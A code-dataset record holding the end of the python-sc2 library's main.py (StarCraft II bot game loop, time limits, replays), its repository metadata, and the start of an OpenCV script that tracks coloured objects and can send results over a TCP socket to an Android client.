state.observation.game_loop * 0.14)\n return Result.Tie\n\n if not realtime:\n await client.step()\n\n\nasync def _play_game_ai(client, player_id, ai, realtime, step_time_limit, game_time_limit):\n if realtime:\n assert step_time_limit is None\n\n # step_time_limit works like this:\n # * If None, then step time is not limited\n # * If given integer or float, the bot will simpy resign if any step takes longer than that\n # * Otherwise step_time_limit must be an object, with following settings:\n #\n # Key | Value | Description\n # ------------|------------|-------------\n # penalty | None | No penalty, the bot can continue on next step\n # penalty | N: int | Cooldown penalty, BotAI.on_step will not be called for N steps\n # penalty | \"resign\" | Bot resigns when going over time limit\n # time_limit | int/float | Time limit for a single step\n # window_size | N: int | The time limit will be used for last N steps, instad of 1\n #\n # Cooldown is a harsh penalty. The both loses the ability to act, but even worse,\n # the observation data from skipped steps is also lost. It's like falling asleep in\n # a middle of the game.\n time_penalty_cooldown = 0\n if step_time_limit is None:\n time_limit = None\n time_window = None\n time_penalty = None\n elif isinstance(step_time_limit, (int, float)):\n time_limit = float(step_time_limit)\n time_window = SlidingTimeWindow(1)\n time_penalty = \"resign\"\n else:\n assert isinstance(step_time_limit, dict)\n time_penalty = step_time_limit.get(\"penalty\", None)\n time_window = SlidingTimeWindow(int(step_time_limit.get(\"window_size\", 1)))\n time_limit = float(step_time_limit.get(\"time_limit\", None))\n\n ai._initialize_variables()\n\n game_data = await client.get_game_data()\n game_info = await client.get_game_info()\n\n # This game_data will become self._game_data in botAI\n ai._prepare_start(client, player_id, game_info, game_data, realtime=realtime)\n state = await client.observation()\n # check game result every time we get the observation\n if client._game_result:\n await ai.on_end(client._game_result[player_id])\n return client._game_result[player_id]\n gs = GameState(state.observation)\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n await ai.on_before_start()\n ai._prepare_first_step()\n try:\n await ai.on_start()\n except Exception as e:\n logger.exception(f\"AI on_start threw an error\")\n logger.error(f\"resigning due to previous error\")\n await ai.on_end(Result.Defeat)\n return Result.Defeat\n\n iteration = 0\n while True:\n if iteration != 0:\n if realtime:\n # On realtime=True, might get an error here: sc2.protocol.ProtocolError: ['Not in a game']\n try:\n requested_step = gs.game_loop + client.game_step\n state = await client.observation(requested_step)\n # If the bot took too long in the previous observation, request another observation one frame after\n if state.observation.observation.game_loop > requested_step:\n # TODO Remove these 2 comments\n # t = state.observation.observation.game_loop\n state = await client.observation(state.observation.observation.game_loop + 1)\n # print(f\"Requested step: {requested_step}, received: {t}, new: {state.observation.observation.game_loop}\")\n except ProtocolError:\n pass\n else:\n state = await client.observation()\n # check game result every time we get the observation\n if client._game_result:\n try:\n await ai.on_end(client._game_result[player_id])\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {client._game_result[player_id]}\")\n return client._game_result[player_id]\n return client._game_result[player_id]\n gs = GameState(state.observation)\n logger.debug(f\"Score: {gs.score.score}\")\n\n if game_time_limit and (gs.game_loop * 0.725 * (1 / 16)) > game_time_limit:\n await ai.on_end(Result.Tie)\n return Result.Tie\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n\n logger.debug(f\"Running AI step, it={iteration} {gs.game_loop * 0.725 * (1 / 16):.2f}s\")\n\n try:\n if realtime:\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n else:\n if time_penalty_cooldown > 0:\n time_penalty_cooldown -= 1\n logger.warning(f\"Running AI step: penalty cooldown: {time_penalty_cooldown}\")\n iteration -= 1 # Do not increment the iteration on this round\n elif time_limit is None:\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n else:\n out_of_budget = False\n budget = time_limit - time_window.available\n\n # Tell the bot how much time it has left attribute\n ai.time_budget_available = budget\n\n if budget < 0:\n logger.warning(f\"Running AI step: out of budget before step\")\n step_time = 0.0\n out_of_budget = True\n else:\n step_start = time.monotonic()\n try:\n async with async_timeout.timeout(budget):\n await ai.issue_events()\n await ai.on_step(iteration)\n except asyncio.TimeoutError:\n step_time = time.monotonic() - step_start\n logger.warning(\n f\"Running AI step: out of budget; \"\n + f\"budget={budget:.2f}, steptime={step_time:.2f}, \"\n + f\"window={time_window.available_fmt}\"\n )\n out_of_budget = True\n step_time = time.monotonic() - step_start\n\n time_window.push(step_time)\n\n if out_of_budget and time_penalty is not None:\n if time_penalty == \"resign\":\n raise RuntimeError(\"Out of time\")\n else:\n time_penalty_cooldown = int(time_penalty)\n time_window.clear()\n\n await ai._after_step()\n except Exception as e:\n if isinstance(e, ProtocolError) and e.is_game_over_error:\n if realtime:\n return None\n result = client._game_result[player_id]\n if result is None:\n logger.error(\"Game over, but no results gathered\")\n raise\n await ai.on_end(result)\n return result\n # NOTE: this message is caught by pytest suite\n logger.exception(f\"AI step threw an error\") # DO NOT EDIT!\n logger.error(f\"Error: {e}\")\n logger.error(f\"Resigning due to previous error\")\n try:\n await ai.on_end(Result.Defeat)\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {Result.Defeat}\")\n return Result.Defeat\n return Result.Defeat\n\n logger.debug(f\"Running AI step: done\")\n\n if not realtime:\n if not client.in_game: # Client left (resigned) the game\n await ai.on_end(client._game_result[player_id])\n return client._game_result[player_id]\n\n await client.step()\n\n iteration += 1\n\n\nasync def _play_game(\n player, client, realtime, portconfig, step_time_limit=None, game_time_limit=None, rgb_render_config=None\n):\n assert isinstance(realtime, bool), repr(realtime)\n\n player_id = await client.join_game(\n player.name, player.race, portconfig=portconfig, rgb_render_config=rgb_render_config\n )\n logging.info(f\"Player {player_id} - {player.name if player.name else str(player)}\")\n\n if isinstance(player, Human):\n result = await _play_game_human(client, player_id, realtime, game_time_limit)\n else:\n result = await _play_game_ai(client, player_id, player.ai, realtime, step_time_limit, game_time_limit)\n\n logging.info(f\"Result for player {player_id} - {player.name if player.name else str(player)}: {result._name_}\")\n\n return result\n\n\nasync def _play_replay(client, ai, realtime=False, player_id=0):\n ai._initialize_variables()\n\n game_data = await client.get_game_data()\n game_info = await client.get_game_info()\n client.game_step = 1\n # This game_data will become self._game_data in botAI\n ai._prepare_start(client, player_id, game_info, game_data, realtime=realtime)\n state = await client.observation()\n # Check game result every time we get the observation\n if client._game_result:\n await ai.on_end(client._game_result[player_id])\n return client._game_result[player_id]\n gs = GameState(state.observation)\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n ai._prepare_first_step()\n try:\n await ai.on_start()\n except Exception as e:\n logger.exception(f\"AI on_start threw an error\")\n logger.error(f\"resigning due to previous error\")\n await ai.on_end(Result.Defeat)\n return Result.Defeat\n\n iteration = 0\n while True:\n if iteration != 0:\n if realtime:\n # TODO: check what happens if a bot takes too long to respond, so that the requested\n # game_loop might already be in the past\n state = await client.observation(gs.game_loop + client.game_step)\n else:\n state = await client.observation()\n # check game result every time we get the observation\n if client._game_result:\n try:\n await ai.on_end(client._game_result[player_id])\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {client._game_result[player_id]}\")\n return client._game_result[player_id]\n return client._game_result[player_id]\n gs = GameState(state.observation)\n logger.debug(f\"Score: {gs.score.score}\")\n\n proto_game_info = await client._execute(game_info=sc_pb.RequestGameInfo())\n ai._prepare_step(gs, proto_game_info)\n\n logger.debug(f\"Running AI step, it={iteration} {gs.game_loop * 0.725 * (1 / 16):.2f}s\")\n\n try:\n if realtime:\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n else:\n\n # Issue event like unit created or unit destroyed\n await ai.issue_events()\n await ai.on_step(iteration)\n await ai._after_step()\n\n except Exception as e:\n if isinstance(e, ProtocolError) and e.is_game_over_error:\n if realtime:\n return None\n # result = client._game_result[player_id]\n # if result is None:\n # logger.error(\"Game over, but no results gathered\")\n # raise\n await ai.on_end(Result.Victory)\n return None\n # NOTE: this message is caught by pytest suite\n logger.exception(f\"AI step threw an error\") # DO NOT EDIT!\n logger.error(f\"Error: {e}\")\n logger.error(f\"Resigning due to previous error\")\n try:\n await ai.on_end(Result.Defeat)\n except TypeError as error:\n # print(f\"caught type error {error}\")\n # print(f\"return {Result.Defeat}\")\n return Result.Defeat\n return Result.Defeat\n\n logger.debug(f\"Running AI step: done\")\n\n if not realtime:\n if not client.in_game: # Client left (resigned) the game\n await ai.on_end(Result.Victory)\n return Result.Victory\n\n await client.step() # unindent one line to work in realtime\n\n iteration += 1\n\n\nasync def _setup_host_game(server, map_settings, players, realtime, random_seed=None, disable_fog=None):\n r = await server.create_game(map_settings, players, realtime, random_seed, disable_fog)\n if r.create_game.HasField(\"error\"):\n err = f\"Could not create game: {CreateGameError(r.create_game.error)}\"\n if r.create_game.HasField(\"error_details\"):\n err += f\": {r.create_game.error_details}\"\n logger.critical(err)\n raise RuntimeError(err)\n\n return Client(server._ws)\n\n\nasync def _host_game(\n map_settings,\n players,\n realtime,\n portconfig=None,\n save_replay_as=None,\n step_time_limit=None,\n game_time_limit=None,\n rgb_render_config=None,\n random_seed=None,\n sc2_version=None,\n disable_fog=None,\n):\n\n assert players, \"Can't create a game without players\"\n\n assert any(isinstance(p, (Human, Bot)) for p in players)\n\n async with SC2Process(\n fullscreen=players[0].fullscreen, render=rgb_render_config is not None, sc2_version=sc2_version\n ) as server:\n await server.ping()\n\n client = await _setup_host_game(server, map_settings, players, realtime, random_seed, disable_fog)\n # Bot can decide if it wants to launch with 'raw_affects_selection=True'\n if not isinstance(players[0], Human) and getattr(players[0].ai, \"raw_affects_selection\", None) is not None:\n client.raw_affects_selection = players[0].ai.raw_affects_selection\n\n try:\n result = await _play_game(\n players[0], client, realtime, portconfig, step_time_limit, game_time_limit, rgb_render_config\n )\n if save_replay_as is not None:\n await client.save_replay(save_replay_as)\n await client.leave()\n await client.quit()\n except ConnectionAlreadyClosed:\n logging.error(f\"Connection was closed before the game ended\")\n return None\n\n return result\n\n\nasync def _host_game_aiter(\n map_settings, players, realtime, portconfig=None, save_replay_as=None, step_time_limit=None, game_time_limit=None,\n):\n assert players, \"Can't create a game without players\"\n\n assert any(isinstance(p, (Human, Bot)) for p in players)\n\n async with SC2Process() as server:\n while True:\n await server.ping()\n\n client = await _setup_host_game(server, map_settings, players, realtime)\n if not isinstance(players[0], Human) and getattr(players[0].ai, \"raw_affects_selection\", None) is not None:\n client.raw_affects_selection = players[0].ai.raw_affects_selection\n\n try:\n result = await _play_game(players[0], client, realtime, portconfig, step_time_limit, game_time_limit)\n\n if save_replay_as is not None:\n await client.save_replay(save_replay_as)\n await client.leave()\n except ConnectionAlreadyClosed:\n logging.error(f\"Connection was closed before the game ended\")\n return\n\n new_players = yield result\n if new_players is not None:\n players = new_players\n\n\ndef _host_game_iter(*args, **kwargs):\n game = _host_game_aiter(*args, **kwargs)\n new_playerconfig = None\n while True:\n new_playerconfig = yield asyncio.get_event_loop().run_until_complete(game.asend(new_playerconfig))\n\n\nasync def _join_game(\n players, realtime, portconfig, save_replay_as=None, step_time_limit=None, game_time_limit=None,\n):\n async with SC2Process(fullscreen=players[1].fullscreen) as server:\n await server.ping()\n\n client = Client(server._ws)\n # Bot can decide if it wants to launch with 'raw_affects_selection=True'\n if not isinstance(players[1], Human) and getattr(players[1].ai, \"raw_affects_selection\", None) is not None:\n client.raw_affects_selection = players[1].ai.raw_affects_selection\n\n try:\n result = await _play_game(players[1], client, realtime, portconfig, step_time_limit, game_time_limit)\n if save_replay_as is not None:\n await client.save_replay(save_replay_as)\n await client.leave()\n await client.quit()\n except ConnectionAlreadyClosed:\n logging.error(f\"Connection was closed before the game ended\")\n return None\n\n return result\n\n\nasync def _setup_replay(server, replay_path, realtime, observed_id):\n await server.start_replay(replay_path, realtime, observed_id)\n return Client(server._ws)\n\n\nasync def _host_replay(replay_path, ai, realtime, portconfig, base_build, data_version, observed_id):\n async with SC2Process(fullscreen=False, base_build=base_build, data_hash=data_version) as server:\n response = await server.ping()\n\n client = await _setup_replay(server, replay_path, realtime, observed_id)\n result = await _play_replay(client, ai, realtime)\n return result\n\n\ndef get_replay_version(replay_path):\n with open(replay_path, \"rb\") as f:\n replay_data = f.read()\n replay_io = six.BytesIO()\n replay_io.write(replay_data)\n replay_io.seek(0)\n archive = mpyq.MPQArchive(replay_io).extract()\n metadata = json.loads(archive[b\"replay.gamemetadata.json\"].decode(\"utf-8\"))\n return metadata[\"BaseBuild\"], metadata[\"DataVersion\"]\n\n\ndef run_game(map_settings, players, **kwargs):\n if sum(isinstance(p, (Human, Bot)) for p in players) > 1:\n host_only_args = [\"save_replay_as\", \"rgb_render_config\", \"random_seed\", \"sc2_version\", \"disable_fog\"]\n join_kwargs = {k: v for k, v in kwargs.items() if k not in host_only_args}\n\n portconfig = Portconfig()\n result = asyncio.get_event_loop().run_until_complete(\n asyncio.gather(\n _host_game(map_settings, players, **kwargs, portconfig=portconfig),\n _join_game(players, **join_kwargs, portconfig=portconfig),\n )\n )\n else:\n result = asyncio.get_event_loop().run_until_complete(_host_game(map_settings, players, **kwargs))\n return result\n\n\ndef run_replay(ai, replay_path, realtime=False, observed_id=0):\n portconfig = Portconfig()\n assert os.path.isfile(replay_path), f\"Replay does not exist at the given path: {replay_path}\"\n assert os.path.isabs(\n replay_path\n ), f'Replay path has to be an absolute path, e.g. \"C:/replays/my_replay.SC2Replay\" but given path was \"{replay_path}\"'\n base_build, data_version = get_replay_version(replay_path)\n result = asyncio.get_event_loop().run_until_complete(\n _host_replay(replay_path, ai, realtime, portconfig, base_build, data_version, observed_id)\n )\n return result\n", "repo_name": "mitchkoko/firstbot", "sub_path": "python-sc2/sc2/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 21385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "client.observation", "line_number": 50, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 51, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 52, "usage_type": "attribute"}, {"api_name": "data.Result.Tie", "line_number": 56, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 56, "usage_type": "name"}, {"api_name": "client.step", "line_number": 59, "usage_type": "call"}, {"api_name": "client.get_game_data", "line_number": 99, "usage_type": "call"}, {"api_name": "client.get_game_info", "line_number": 100, "usage_type": "call"}, {"api_name": "client.observation", "line_number": 104, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 106, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 107, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 108, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 109, "usage_type": "call"}, {"api_name": "client._execute", "line_number": 110, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 110, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2", "line_number": 110, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 119, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 119, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 120, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 120, "usage_type": "name"}, {"api_name": "client.game_step", "line_number": 128, "usage_type": "attribute"}, {"api_name": "client.observation", "line_number": 129, "usage_type": "call"}, {"api_name": "client.observation", "line_number": 134, "usage_type": "call"}, {"api_name": "protocol.ProtocolError", "line_number": 136, "usage_type": "name"}, {"api_name": "client.observation", "line_number": 139, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 141, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 143, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 147, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 148, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 149, "usage_type": "call"}, {"api_name": "data.Result.Tie", "line_number": 153, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 153, "usage_type": "name"}, {"api_name": "data.Result.Tie", "line_number": 154, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 154, "usage_type": "name"}, {"api_name": "client._execute", "line_number": 155, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 155, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2", "line_number": 155, "usage_type": "name"}, {"api_name": "time.monotonic", "line_number": 188, "usage_type": "call"}, {"api_name": "async_timeout.timeout", "line_number": 190, "usage_type": "call"}, {"api_name": "asyncio.TimeoutError", "line_number": 193, "usage_type": "attribute"}, {"api_name": "time.monotonic", "line_number": 194, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 201, "usage_type": "call"}, {"api_name": "protocol.ProtocolError", "line_number": 214, "usage_type": "argument"}, {"api_name": "client._game_result", "line_number": 217, "usage_type": "attribute"}, {"api_name": "data.Result.Defeat", "line_number": 228, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 228, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 232, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 232, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 233, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 233, "usage_type": "name"}, {"api_name": "client.in_game", "line_number": 238, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 239, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 240, "usage_type": "attribute"}, {"api_name": "client.step", "line_number": 242, "usage_type": "call"}, {"api_name": "client.join_game", "line_number": 252, "usage_type": "call"}, {"api_name": "player.name", "line_number": 253, "usage_type": "attribute"}, {"api_name": "player.race", "line_number": 253, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 255, "usage_type": "call"}, {"api_name": "player.name", "line_number": 255, "usage_type": "attribute"}, {"api_name": "player.Human", "line_number": 257, "usage_type": "argument"}, {"api_name": "player.ai", "line_number": 260, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 262, "usage_type": "call"}, {"api_name": "player.name", "line_number": 262, "usage_type": "attribute"}, {"api_name": "client.get_game_data", "line_number": 270, "usage_type": "call"}, {"api_name": "client.get_game_info", "line_number": 271, "usage_type": "call"}, {"api_name": "client.game_step", "line_number": 272, "usage_type": "attribute"}, {"api_name": "client.observation", "line_number": 275, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 277, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 278, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 279, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 280, "usage_type": "call"}, {"api_name": "client._execute", "line_number": 281, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 281, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2", "line_number": 281, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 289, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 289, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 290, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 290, "usage_type": "name"}, {"api_name": "client.observation", "line_number": 298, "usage_type": "call"}, {"api_name": "client.game_step", "line_number": 298, "usage_type": "attribute"}, {"api_name": "client.observation", "line_number": 300, "usage_type": "call"}, {"api_name": "client._game_result", "line_number": 302, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 304, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 308, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 309, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 310, "usage_type": "call"}, {"api_name": "client._execute", "line_number": 313, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 313, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2", "line_number": 313, "usage_type": "name"}, {"api_name": "protocol.ProtocolError", "line_number": 332, "usage_type": "argument"}, {"api_name": "data.Result.Victory", "line_number": 339, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 339, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 346, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 346, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 350, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 350, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 351, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 351, "usage_type": "name"}, {"api_name": "client.in_game", "line_number": 356, "usage_type": "attribute"}, {"api_name": "data.Result.Victory", "line_number": 357, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 357, "usage_type": "name"}, {"api_name": "data.Result.Victory", "line_number": 358, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 358, "usage_type": "name"}, {"api_name": "client.step", "line_number": 360, "usage_type": "call"}, {"api_name": "data.CreateGameError", "line_number": 368, "usage_type": "call"}, {"api_name": "client.Client", "line_number": 374, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 393, "usage_type": "name"}, {"api_name": "player.Bot", "line_number": 393, "usage_type": "name"}, {"api_name": "sc2process.SC2Process", "line_number": 395, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 402, "usage_type": "argument"}, {"api_name": "client.raw_affects_selection", "line_number": 403, "usage_type": "attribute"}, {"api_name": "client.save_replay", "line_number": 410, "usage_type": "call"}, {"api_name": "client.leave", "line_number": 411, "usage_type": "call"}, {"api_name": "client.quit", "line_number": 412, "usage_type": "call"}, {"api_name": "protocol.ConnectionAlreadyClosed", "line_number": 413, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 414, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 425, "usage_type": "name"}, {"api_name": "player.Bot", "line_number": 425, "usage_type": "name"}, {"api_name": "sc2process.SC2Process", "line_number": 427, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 432, "usage_type": "argument"}, {"api_name": "client.raw_affects_selection", "line_number": 433, "usage_type": "attribute"}, {"api_name": "client.save_replay", "line_number": 439, "usage_type": "call"}, {"api_name": "client.leave", "line_number": 440, "usage_type": "call"}, {"api_name": "protocol.ConnectionAlreadyClosed", "line_number": 441, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 442, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 454, "usage_type": "call"}, {"api_name": "sc2process.SC2Process", "line_number": 460, "usage_type": "call"}, {"api_name": "client.Client", "line_number": 463, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 465, "usage_type": "argument"}, {"api_name": "client.raw_affects_selection", "line_number": 466, "usage_type": "attribute"}, {"api_name": "client.save_replay", "line_number": 471, "usage_type": "call"}, {"api_name": "client.leave", "line_number": 472, "usage_type": "call"}, {"api_name": "client.quit", "line_number": 473, "usage_type": "call"}, {"api_name": "protocol.ConnectionAlreadyClosed", "line_number": 474, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 475, "usage_type": "call"}, {"api_name": "client.Client", "line_number": 483, "usage_type": "call"}, {"api_name": "sc2process.SC2Process", "line_number": 487, "usage_type": "call"}, {"api_name": "six.BytesIO", "line_number": 498, "usage_type": "call"}, {"api_name": "mpyq.MPQArchive", "line_number": 501, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 502, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 507, "usage_type": "name"}, {"api_name": "player.Bot", "line_number": 507, "usage_type": "name"}, {"api_name": "portconfig.Portconfig", "line_number": 511, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 512, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 513, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 519, "usage_type": "call"}, {"api_name": "portconfig.Portconfig", "line_number": 524, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path", "line_number": 525, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 526, "usage_type": "call"}, {"api_name": "os.path", "line_number": 526, "usage_type": "attribute"}, {"api_name": "asyncio.get_event_loop", "line_number": 530, "usage_type": "call"}]} +{"seq_id": "14211099431", "text": "import cv2\r\nimport numpy as np\r\nfrom csv_managment import comparate_with_database\r\nimport socket\r\n\r\nadress = '0.0.0.0'\r\nport = 8081\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsock.bind((adress, port))\r\nsock.listen(1)\r\n\r\nconnections = []\r\nwithAndroid = False\r\n\r\nfinger_position_list = [[], []]\r\n\r\ndef string(vec):\r\n result = \"\"\r\n for i in vec:\r\n result += str(i) + \"!\"\r\n\r\n return result\r\n\r\ndef send(message):\r\n for connection in connections:\r\n connection.send(bytes(message + \"\\n\", 'utf-8'))\r\n\r\nif (withAndroid):\r\n print(\"Waiting for connections\")\r\n while True:\r\n client, a = sock.accept()\r\n connections.append(client)\r\n break\r\n\r\n print(\"Connected\")\r\n print(connections)\r\n\r\ncap = cv2.VideoCapture(0)\r\n_, img3 = cap.read()\r\n\r\nx1, y1, x2, y2 = 0,0,0,0\r\n\r\ncounter = 0\r\nsalidaFinal = \"\"\r\nisSend = False\r\nmensaje = \"\"\r\nwhile (cap.isOpened()):\r\n _, frame = cap.read()\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n \r\n # define range of white color in HSV\r\n # change it according to your need !\r\n #lower_white = np.array([0, 0, 215])\r\n #upper_white = np.array([180, 15, 255])\r\n #lower_white = np.array([0, 0, 230])\r\n #upper_white = np.array([180, 25, 255])\r\n \r\n # Threshold the HSV image to get only white colors\r\n #mask = cv2.inRange(hsv, lower_white, upper_white)\r\n # Bitwise-AND mask and original image\r\n #res = cv2.bitwise_and(frame,frame, mask= mask)\r\n #umbral = cv2.threshold(mask, 25, 255, cv2.THRESH_BINARY)[1]\r\n #umbral = cv2.dilate(umbral, None, iterations=2)\r\n \r\n #contornosimg = umbral.copy()\r\n # Buscamos contorno en la imagen\r\n #im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n \r\n \r\n \r\n \"\"\"\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 4000):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 40000):\r\n continue\r\n else:\r\n \r\n (xa, ya, wa, ha) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n if(xa>40 and ya>40 and wa+80(x1+30) or xa<(x1-30)):\r\n if(x1(y1+30) or ya<(y1-30)):\r\n if(y1 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n red_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"RED color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255))\r\n xr = x\r\n yr = y\r\n \r\n contornosimg = blue.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n xb = 0\r\n yb = 0\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x +w, y+h), (255, 0, 0), 2)\r\n blue_objects.append([(x + w)/2 , (y+h)/2])\r\n xb = x\r\n yb = y\r\n cv2.putText(frame,\"BLUE color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,0.7,(255,0,0))\r\n\r\n \r\n\r\n #Tracking the YELLOW Color\r\n \r\n contornosimg = yellow.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n yellow_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"YELLLOW color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n\r\n\r\n #Tracking the purple Color\r\n contornosimg = purple.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n purple_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"purple 